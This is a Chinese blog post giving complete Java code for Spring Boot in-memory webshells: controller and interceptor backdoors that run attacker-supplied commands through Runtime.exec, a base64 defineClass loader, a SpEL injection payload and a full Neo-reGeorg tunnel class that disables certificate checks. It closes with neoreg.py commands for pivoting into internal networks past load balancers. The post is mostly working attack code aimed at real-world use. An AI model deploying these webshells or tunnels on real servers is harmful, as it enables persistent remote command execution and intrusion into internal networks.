51工具盒子前言
萌新第一次玩java,水一篇文章
SpringBoot 内存马类别
controller 控制器内存马 {#toc_0}
什么是控制器内存马?按照其他语言的理解,就是在原有的路由上增加一条路由
使用网络上的代码动态添加路由
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
// 2. 从context中获得 RequestMappingHandlerMapping 的实例
assert context != null;
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
// 3. 通过反射获得自定义 controller 中的 Method 对象
Method method = InjectToController.class.getMethod("test");
// 4. 定义访问 controller 的 URL 地址
PatternsRequestCondition url = new PatternsRequestCondition("/asdasd");
// 5. 定义允许访问 controller 的 HTTP 方法(GET/POST)
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
// 6. 在内存中动态注册 controller
RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);
InjectToController injectToController = new InjectToController();
mappingHandlerMapping.registerMapping(info, injectToController, method);
注入controller内存马的时候遇到 Expected lookupPath in request attribute 报错问题 {#toc_1}
注入的时候遇到这个错误
java.lang.IllegalArgumentException: Expected lookupPath in request attribute "org.springframework.web.util.UrlPathHelper.PATH".
这是由于springboot对路由匹配方式进行修改
这再springboot 2.6.0之后就会遇到,一般而言解决方案是再properties添加如下然后重启
spring.mvc.pathmatch.matching-strategy=ANT_PATH_MATCHER
或者降低版本,但是我实际注入的时候肯定不能直接就这么轻松修改,所以得替换成如下方式
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = Evil.class.getMethod("test");
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
RequestMappingInfo info = RequestMappingInfo.paths("/test2")
.options(config)
.build();
Evil springControllerMemShell = new Evil("aaa");
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
完整代码 {#toc_2}
package com.example.springtest;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import java.lang.reflect.Method;
public class Evil {
public Evil() {
}
public void test() throws Exception {
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getResponse();
System.out.println(request.getParameter("cmd"));
Runtime.getRuntime().exec(request.getParameter("cmd"));
}
public static String inject() throws NoSuchMethodException, ClassNotFoundException, InstantiationException, IllegalAccessException, NoSuchFieldException {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = Evil.class.getMethod("test");
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
RequestMappingInfo info = RequestMappingInfo.paths("/test2")
.options(config)
.build();
Evil springControllerMemShell = new Evil();
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
return "ok";
}
}
Interceptor 拦截器内存马 {#toc_3}
Controller虽然简单明了,但是面对有些路由收到保护的站点的时候,就有些局限性了。
最典型的是如果你没有登录,所有路由都被跳转到/login,这样子你如果没能登录就没办法执行到你的内存马了,所以这时候就要添加一个拦截器类型的内存马,代码如下
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = Evil.class.getMethod("test");
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
RequestMappingInfo info = RequestMappingInfo.paths("/test2")
.options(config)
.build();
Evil springControllerMemShell = new Evil("aaa");
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
完整代码 {#toc_4}
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.web.bind.annotation.RequestMethod;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
public class Evil extends HandlerInterceptorAdapter {
public Evil() {
}
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
String code = request.getParameter("code");
System.out.println("VulInterceptor Running...");
if(code != null){
try {
Runtime.getRuntime().exec(code);
}catch (Exception e){
}
return false;
}
return true;
}
public static String injectInterceptor(){
try {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(requestMappingHandlerMapping);
Evil vulInterceptor = new Evil();
adaptedInterceptors.add(vulInterceptor);
return "inject ok...";
}catch (Exception ex)
{
return "inject fail...";
}
}
}
实战环境中构造函数递归问题
在实战环境中,我们的调用并不会放到main中,而是丢到析构函数Evil()中,所以在我们析构函数调用注入器,装载注册器的时候,有一段代码
Evil vulInterceptor = new Evil();
adaptedInterceptors.add(vulInterceptor);
中,就又加载了Eval函数,然后又调用析构函数,然后又执行这段代码又装载注入器.....这就造成了递归,所以我们得需要对这块进行一些处理
如何处理呢?就是简单的加一个参数,判断是否由注册器加载,如果是注册器就掠过,不是则执行注册器
析构函数关键代码:
public Evil(int aaa)
{
if(aaa != 111){
do_inject();
}
}
注册器关键代码
Evil vulInterceptor = new Evil(111);
adaptedInterceptors.add(vulInterceptor);
这样就不会递归了,但是我们加载这个的时候,遇到另一个问题,普通的newInstance是没办法带参数的。所以我们就要修改成带参数调用newInstance,我们假设我们的恶意class由base64传递
完整代码 {#toc_5}
注入器部分
Method defineClass = ClassLoader.class.getDeclaredMethod("defineClass",String.class,byte[].class,int.class,int.class);
defineClass.setAccessible(true);
byte[] code = Base64.getDecoder().decode("恶意class的base64");
Class Evil = (Class)defineClass.invoke(ClassLoader.getSystemClassLoader(),"Evil",code,0,code.length);
Constructor constructor=Evil.getDeclaredConstructor(int.class);//这里要设置和析构函数的参数一样,我们Eval里只有一个int所以就设置成int
constructor.setAccessible(true);
constructor.newInstance(222);
恶意类部分
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.handler.HandlerInterceptorAdapter;
import org.springframework.web.servlet.mvc.condition.RequestMethodsRequestCondition;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
public class Evil extends HandlerInterceptorAdapter {
public Evil(int aaa) throws NoSuchMethodException ,NoSuchFieldException, ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException {
if(aaa != 111){
inject();
injectInterceptor();
System.out.println("Inject ok");
}
}
public boolean preHandle(HttpServletRequest request, HttpServletResponse response, Object handler) throws Exception {
String code = request.getParameter("code");
System.out.println(request.getRequestURI());
if(request.getRequestURI().equals("/check")){
java.io.PrintWriter printWriter = response.getWriter();
printWriter.write("Interceptor inject ok!");
printWriter.flush();
printWriter.close();
}
if(code != null){
try {
Runtime.getRuntime().exec(code);
}catch (Exception e){
}
return false;
}
return true;
}
public void test() throws Exception {
HttpServletRequest request = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getRequest();
HttpServletResponse response = ((ServletRequestAttributes) RequestContextHolder.currentRequestAttributes()).getResponse();
Runtime.getRuntime().exec(request.getParameter("cmd"));
response.getWriter().write("ok");
}
public static String inject() throws NoSuchMethodException, ClassNotFoundException, InstantiationException, IllegalAccessException, NoSuchFieldException {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config =
(RequestMappingInfo.BuilderConfiguration) configField.get(mappingHandlerMapping);
Method method2 = Evil.class.getMethod("test");
RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();
RequestMappingInfo info = RequestMappingInfo.paths("/test2")
.options(config)
.build();
Evil springControllerMemShell = new Evil(111);
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
return "ok";
}
public static String injectInterceptor(){
try {
WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping requestMappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);
java.lang.reflect.Field field = org.springframework.web.servlet.handler.AbstractHandlerMapping.class.getDeclaredField("adaptedInterceptors");
field.setAccessible(true);
java.util.ArrayList<Object> adaptedInterceptors = (java.util.ArrayList<Object>)field.get(requestMappingHandlerMapping);
Evil vulInterceptor = new Evil(111);
adaptedInterceptors.add(vulInterceptor);
return "inject ok...";
}catch (Exception ex)
{
return "inject fail...";
}
}
}
SPEL注入内存马
SPEL表达式一定程度上能执行java代码,那么能执行代码就非常简单了,直接调用defineclass把我们的恶意class加载进去执行不就完事了。
这里不考虑过滤and拦截的情况,实战肯定会遇到各种奇奇怪怪的情况的
获取java版本
#{T(java.lang.System).getProperty("java.version")}
获取springboot版本
#{T(org.springframework.boot.SpringBootVersion).getPackage()}
注入内存马,直接照抄上面的base64注入即可
T(org.springframework.cglib.core.ReflectUtils)
.defineClass(
'Evil',
T(com.sun.org.apache.xml.internal.security.utils.Base64)
.decode('base64'),T(org.springframework.util.ClassUtils).getDefaultClassLoader()
).getDeclaredConstructor(T(int)).newInstance(222)
注入Neo-reGeorg到内存马
Neo-reGeorg直接生成了java文件,非常的方便我们使用。先运行
python neoreg.py generate -k password 生成server模板,
然后把我们的的java模板提取出来,直接看jsp关键代码
Object[] args = new Object[]{ ... }
Class clazz = new U(this.getClass().getClassLoader()).g(clazzBytes);
application.setAttribute("ok",clazz.newInstance());
application.getAttribute("ok").equals(args);
基本就是一个把byte的class文件反射加载到内存然后调用equals,但是我们注入的时候本来就是class了,所以不需要再进行一次byte转class操作,直接在同一个类下调用就行。完整代码
//
// Source code recreated from a .class file by IntelliJ IDEA
// (powered by FernFlower decompiler)
//
import java.io.ByteArrayOutputStream;
import java.io.InputStream;
import java.io.OutputStream;
import java.io.Writer;
import java.lang.reflect.Field;
import java.lang.reflect.Method;
import java.net.HttpURLConnection;
import java.net.Inet4Address;
import java.net.InetAddress;
import java.net.InetSocketAddress;
import java.net.NetworkInterface;
import java.net.URL;
import java.nio.ByteBuffer;
import java.nio.channels.SocketChannel;
import java.security.SecureRandom;
import java.security.cert.CertificateException;
import java.security.cert.X509Certificate;
import java.util.Collections;
import java.util.Enumeration;
import java.util.Iterator;
import java.util.List;
import javax.net.ssl.HostnameVerifier;
import javax.net.ssl.HttpsURLConnection;
import javax.net.ssl.KeyManager;
import javax.net.ssl.SSLContext;
import javax.net.ssl.SSLSession;
import javax.net.ssl.TrustManager;
import javax.net.ssl.X509TrustManager;
import javax.servlet.ServletContext;
import javax.servlet.ServletInputStream;
import javax.servlet.http.HttpServletRequest;
import javax.servlet.http.HttpServletResponse;
import org.springframework.web.context.WebApplicationContext;
import org.springframework.web.context.request.RequestContextHolder;
import org.springframework.web.context.request.ServletRequestAttributes;
import org.springframework.web.servlet.mvc.method.RequestMappingInfo;
import org.springframework.web.servlet.mvc.method.annotation.RequestMappingHandlerMapping;
public class NeoreGeorg implements HostnameVerifier, X509TrustManager {
private char[] en;
private byte[] de;
public void MemNeoregeorg() {
HttpServletRequest request = ((ServletRequestAttributes)((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes())).getRequest();
HttpServletResponse response = ((ServletRequestAttributes)((ServletRequestAttributes)RequestContextHolder.currentRequestAttributes())).getResponse();
Object[] args = new Object[]{request, response, "CE0XgUOIQFsw1tcy+H95alrukYfdznxZR8PJo2qbh4pe6/VDKijTL3v7BAmGMSNW".toCharArray(), new byte[]{-1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, -1, 16, -1, -1, -1, 45, 2, 12, 37, 53, 41, 19, 44, 55, 33, 18, -1, -1, -1, -1, -1, -1, -1, 57, 56, 0, 47, 1, 9, 59, 17, 7, 35, 48, 52, 60, 62, 6, 34, 8, 32, 61, 51, 5, 46, 63, 3, 25, 31, -1, -1, -1, -1, -1, -1, 20, 39, 14, 27, 43, 26, 4, 40, 49, 50, 24, 21, 58, 29, 36, 42, 38, 22, 10, 13, 23, 54, 11, 30, 15, 28, -1, -1, -1, -1, -1}, 200, 513, 524288, "Sbxspawzq", "Die", "Ffydhndmhhl", "Nnpo", "Mueytrthxaatjpsb", "G87IdjaYlmwUWO9QjVFHPeP2SVfeMhzT6_pvfN46Km7PazEmu225XmpiAa", "<!-- HdgznEy73Ghv4jiuh5s83czHnFBYBpOdRVE4qyMTNktshD7xIS9S09PrPNH -->", "3uD0bq9GsCGpZcPIjwXcyj0ibSRDGyCcJI7lWF9Sh8uLqoNgpQWQAPBcM", "k4MBX7QElVQzrmOdkml_G3pnYz55EFZPIwTO", "CapFLueBCn2ZM", "YGsjBNsJR8DHQ3b5mVVVvruEH7oUHk", "b5v9XJbF", "0FX", "TQDLLDvYzyrB4pPbieRBk90FIdYgjJcE2si70wIXfql", "CtWP7tBSKiDnysT9hP9pa", "oA9zNzisf6JqAYWYiKxPyeDALbg2jqhvIgTdBbebH201BCYUKnD", "9NMcA1i8lzO779wa6O", "QmPrA86mT15", "C23vc07BCOdIsUHAmDM4nNP01x7zR4uKsWbBrOV"};
this.equals(args);
}
public static String injectMemNeoreGeorg() throws NoSuchMethodException, ClassNotFoundException, InstantiationException, IllegalAccessException, NoSuchFieldException {
WebApplicationContext context = (WebApplicationContext)RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);
RequestMappingHandlerMapping mappingHandlerMapping = (RequestMappingHandlerMapping)context.getBean(RequestMappingHandlerMapping.class);
Field configField = mappingHandlerMapping.getClass().getDeclaredField("config");
configField.setAccessible(true);
RequestMappingInfo.BuilderConfiguration config = (RequestMappingInfo.BuilderConfiguration)configField.get(mappingHandlerMapping);
Method method2 = NeoreGeorg.class.getMethod("MemNeoregeorg");
RequestMappingInfo info = RequestMappingInfo.paths(new String[]{"/neo"}).options(config).build();
NeoreGeorg springControllerMemShell = new NeoreGeorg(111);
mappingHandlerMapping.registerMapping(info, springControllerMemShell, method2);
return "ok";
}
public NeoreGeorg(int bbb) throws NoSuchFieldException, ClassNotFoundException, NoSuchMethodException, InstantiationException, IllegalAccessException {
if (bbb != 111) {
injectMemNeoreGeorg();
}
}
public boolean equals(Object obj) {
try {
Object[] args = (Object[])((Object[])obj);
HttpServletRequest request = (HttpServletRequest)args[0];
HttpServletResponse response = (HttpServletResponse)args[1];
this.en = (char[])((char[])args[2]);
this.de = (byte[])((byte[])args[3]);
int HTTPCODE = (Integer)args[4];
int READBUF = (Integer)args[5];
int MAXREADSIZE = (Integer)args[6];
String XSTATUS = (String)args[7];
String XERROR = (String)args[8];
String XCMD = (String)args[9];
String XTARGET = (String)args[10];
String XREDIRECTURL = (String)args[11];
String FAIL = (String)args[12];
String GeorgHello = (String)args[13];
String FailedCreatingSocket = (String)args[14];
String FailedConnecting = (String)args[15];
String OK = (String)args[16];
String FailedWriting = (String)args[17];
String CONNECT = (String)args[18];
String DISCONNECT = (String)args[19];
String READ = (String)args[20];
String FORWARD = (String)args[21];
String FailedReading = (String)args[22];
String CloseNow = (String)args[23];
String ReadFiled = (String)args[24];
String ForwardingFailed = (String)args[25];
ServletContext application = request.getSession().getServletContext();
Writer out = response.getWriter();
String rUrl = request.getHeader(XREDIRECTURL);
String cmd;
int buffLen;
byte[] buff;
if (rUrl != null) {
rUrl = new String(this.b64de(rUrl));
if (!this.islocal(rUrl)) {
response.reset();
cmd = request.getMethod();
URL u = new URL(rUrl);
HttpURLConnection conn = (HttpURLConnection)u.openConnection();
if (HttpsURLConnection.class.isInstance(conn)) {
((HttpsURLConnection)conn).setHostnameVerifier(this);
SSLContext ctx = SSLContext.getInstance("SSL");
ctx.init((KeyManager[])null, new TrustManager[]{this}, (SecureRandom)null);
((HttpsURLConnection)conn).setSSLSocketFactory(ctx.getSocketFactory());
}
conn.setRequestMethod(cmd);
conn.setDoOutput(true);
Enumeration enu = request.getHeaderNames();
List&lt;String&gt; keys = Collections.list(enu);
Collections.reverse(keys);
Iterator var56 = keys.iterator();
while(var56.hasNext()) {
String key = (String)var56.next();
if (!key.equalsIgnoreCase(XREDIRECTURL)) {
String value = request.getHeader(key);
conn.setRequestProperty(headerkey(key), value);
}
}
buff = new byte[1024];
if (request.getContentLength() != -1) {
OutputStream output;
try {
output = conn.getOutputStream();
} catch (Exception var40) {
response.setHeader(XERROR, ForwardingFailed);
return false;
}
ServletInputStream inputStream = request.getInputStream();
while((buffLen = inputStream.read(buff)) != -1) {
output.write(buff, 0, buffLen);
}
output.flush();
output.close();
}
Iterator var62 = conn.getHeaderFields().keySet().iterator();
String responseBody;
while(var62.hasNext()) {
String key = (String)var62.next();
if (key != null &amp;amp;&amp;amp; !key.equalsIgnoreCase(&amp;quot;Content-Length&amp;quot;) &amp;amp;&amp;amp; !key.equalsIgnoreCase(&amp;quot;Transfer-Encoding&amp;quot;)) {
responseBody = conn.getHeaderField(key);
response.setHeader(key, responseBody);
}
}
InputStream hin;
if (conn.getResponseCode() &amp;lt; 400) {
hin = conn.getInputStream();
} else {
hin = conn.getErrorStream();
if (hin == null) {
response.setStatus(HTTPCODE);
return false;
}
}
ByteArrayOutputStream baos = new ByteArrayOutputStream();
while((buffLen = hin.read(buff)) != -1) {
byte[] data = new byte[buffLen];
System.arraycopy(buff, 0, data, 0, buffLen);
baos.write(data);
}
responseBody = new String(baos.toByteArray());
response.addHeader(&amp;quot;Content-Length&amp;quot;, Integer.toString(responseBody.length()));
response.setStatus(conn.getResponseCode());
out.write(responseBody);
out.flush();
out.close();
return false;
}
}
response.resetBuffer();
response.setStatus(HTTPCODE);
cmd = request.getHeader(XCMD);
if (cmd != null) {
String mark = cmd.substring(0, 22);
cmd = cmd.substring(22);
response.setHeader(XSTATUS, OK);
String inputData;
int bytesRead;
if (cmd.compareTo(CONNECT) == 0) {
try {
String[] target_ary = (new String(this.b64de(request.getHeader(XTARGET)))).split(&amp;quot;\\|&amp;quot;);
inputData = target_ary[0];
bytesRead = Integer.parseInt(target_ary[1]);
SocketChannel socketChannel = SocketChannel.open();
socketChannel.connect(new InetSocketAddress(inputData, bytesRead));
socketChannel.configureBlocking(false);
application.setAttribute(mark, socketChannel);
response.setHeader(XSTATUS, OK);
} catch (Exception var42) {
response.setHeader(XERROR, FailedConnecting);
response.setHeader(XSTATUS, FAIL);
}
} else {
SocketChannel socketChannel;
if (cmd.compareTo(DISCONNECT) == 0) {
socketChannel = (SocketChannel)application.getAttribute(mark);
try {
socketChannel.socket().close();
} catch (Exception var41) {
}
application.removeAttribute(mark);
} else if (cmd.compareTo(READ) == 0) {
socketChannel = (SocketChannel)application.getAttribute(mark);
try {
ByteBuffer buf = ByteBuffer.allocate(READBUF);
bytesRead = socketChannel.read(buf);
buffLen = MAXREADSIZE;
for(int readLen = 0; bytesRead &amp;gt; 0; bytesRead = socketChannel.read(buf)) {
byte[] data = new byte[bytesRead];
System.arraycopy(buf.array(), 0, data, 0, bytesRead);
out.write(this.b64en(data));
out.flush();
buf.clear();
readLen += bytesRead;
if (bytesRead &amp;lt; READBUF || readLen &amp;gt;= buffLen) {
break;
}
}
response.setHeader(XSTATUS, OK);
out.close();
} catch (Exception var44) {
response.setHeader(XSTATUS, FAIL);
}
} else if (cmd.compareTo(FORWARD) == 0) {
socketChannel = (SocketChannel)application.getAttribute(mark);
try {
inputData = &amp;quot;&amp;quot;;
InputStream in = request.getInputStream();
while(true) {
buffLen = in.available();
if (buffLen == -1) {
break;
}
buff = new byte[buffLen];
if (in.read(buff) == -1) {
break;
}
inputData = inputData + new String(buff);
}
byte[] base64 = this.b64de(inputData);
ByteBuffer buf = ByteBuffer.allocate(base64.length);
buf.put(base64);
buf.flip();
while(buf.hasRemaining()) {
socketChannel.write(buf);
}
response.setHeader(XSTATUS, OK);
} catch (Exception var43) {
response.setHeader(XERROR, ReadFiled);
response.setHeader(XSTATUS, FAIL);
socketChannel.socket().close();
}
}
}
} else {
out.write(GeorgHello);
out.flush();
out.close();
}
} catch (Exception var45) {
}
return false;
}
public String b64en(byte[] data) {
StringBuffer sb = new StringBuffer();
int len = data.length;
int i = 0;
while(i &lt; len) {
int b1 = data[i++] &amp; 255;
if (i == len) {
sb.append(this.en[b1 &gt;&gt;&gt; 2]);
sb.append(this.en[(b1 &amp; 3) &lt;&lt; 4]);
sb.append(&quot;==&quot;);
break;
}
int b2 = data[i++] &amp;amp; 255;
if (i == len) {
sb.append(this.en[b1 &amp;gt;&amp;gt;&amp;gt; 2]);
sb.append(this.en[(b1 &amp;amp; 3) &amp;lt;&amp;lt; 4 | (b2 &amp;amp; 240) &amp;gt;&amp;gt;&amp;gt; 4]);
sb.append(this.en[(b2 &amp;amp; 15) &amp;lt;&amp;lt; 2]);
sb.append(&amp;quot;=&amp;quot;);
break;
}
int b3 = data[i++] &amp;amp; 255;
sb.append(this.en[b1 &amp;gt;&amp;gt;&amp;gt; 2]);
sb.append(this.en[(b1 &amp;amp; 3) &amp;lt;&amp;lt; 4 | (b2 &amp;amp; 240) &amp;gt;&amp;gt;&amp;gt; 4]);
sb.append(this.en[(b2 &amp;amp; 15) &amp;lt;&amp;lt; 2 | (b3 &amp;amp; 192) &amp;gt;&amp;gt;&amp;gt; 6]);
sb.append(this.en[b3 &amp;amp; 63]);
}
return sb.toString();
}
public byte[] b64de(String str) {
byte[] data = str.getBytes();
int len = data.length;
ByteArrayOutputStream buf = new ByteArrayOutputStream(len);
int i = 0;
while(i &lt; len) {
byte b1;
do {
b1 = this.de[data[i++]];
} while(i &lt; len &amp;&amp; b1 == -1);
if (b1 == -1) {
break;
}
byte b2;
do {
b2 = this.de[data[i++]];
} while(i &amp;lt; len &amp;amp;&amp;amp; b2 == -1);
if (b2 == -1) {
break;
}
buf.write(b1 &amp;lt;&amp;lt; 2 | (b2 &amp;amp; 48) &amp;gt;&amp;gt;&amp;gt; 4);
byte b3;
do {
b3 = data[i++];
if (b3 == 61) {
return buf.toByteArray();
}
b3 = this.de[b3];
} while(i &amp;lt; len &amp;amp;&amp;amp; b3 == -1);
if (b3 == -1) {
break;
}
buf.write((b2 &amp;amp; 15) &amp;lt;&amp;lt; 4 | (b3 &amp;amp; 60) &amp;gt;&amp;gt;&amp;gt; 2);
byte b4;
do {
b4 = data[i++];
if (b4 == 61) {
return buf.toByteArray();
}
b4 = this.de[b4];
} while(i &amp;lt; len &amp;amp;&amp;amp; b4 == -1);
if (b4 == -1) {
break;
}
buf.write((b3 &amp;amp; 3) &amp;lt;&amp;lt; 6 | b4);
}
return buf.toByteArray();
}
static String headerkey(String str) throws Exception {
String out = "";
String[] var2 = str.split("-");
int var3 = var2.length;
for(int var4 = 0; var4 &lt; var3; ++var4) {
String block = var2[var4];
out = out + block.substring(0, 1).toUpperCase() + block.substring(1);
out = out + &quot;-&quot;;
}
return out.substring(0, out.length() - 1);
}
boolean islocal(String url) throws Exception {
String ip = (new URL(url)).getHost();
Enumeration<NetworkInterface> nifs = NetworkInterface.getNetworkInterfaces();
while(nifs.hasMoreElements()) {
NetworkInterface nif = (NetworkInterface)nifs.nextElement();
Enumeration&lt;InetAddress&gt; addresses = nif.getInetAddresses();
while(addresses.hasMoreElements()) {
InetAddress addr = (InetAddress)addresses.nextElement();
if (addr instanceof Inet4Address &amp;amp;&amp;amp; addr.getHostAddress().equals(ip)) {
return true;
}
}
}
return false;
}
public boolean verify(String s, SSLSession sslSession) {
return true;
}
public void checkClientTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
public void checkServerTrusted(X509Certificate[] x509Certificates, String s) throws CertificateException {
}
public X509Certificate[] getAcceptedIssuers() {
return new X509Certificate[0];
}
}
Neo-reGorg 负载均衡
对于mysql这类长连接的代理,遇上负载均衡就会一直爆炸,所以得用
#{T(java.net.InetAddress).getLocalHost().getHostAddress()}
的方式先查看内网负债均衡节点的IP,然后使用
python neoreg.py -k password -u target/neo -r 内网ip/neo
指定内网节点作为转发,获取到一个稳定的长连接隧道
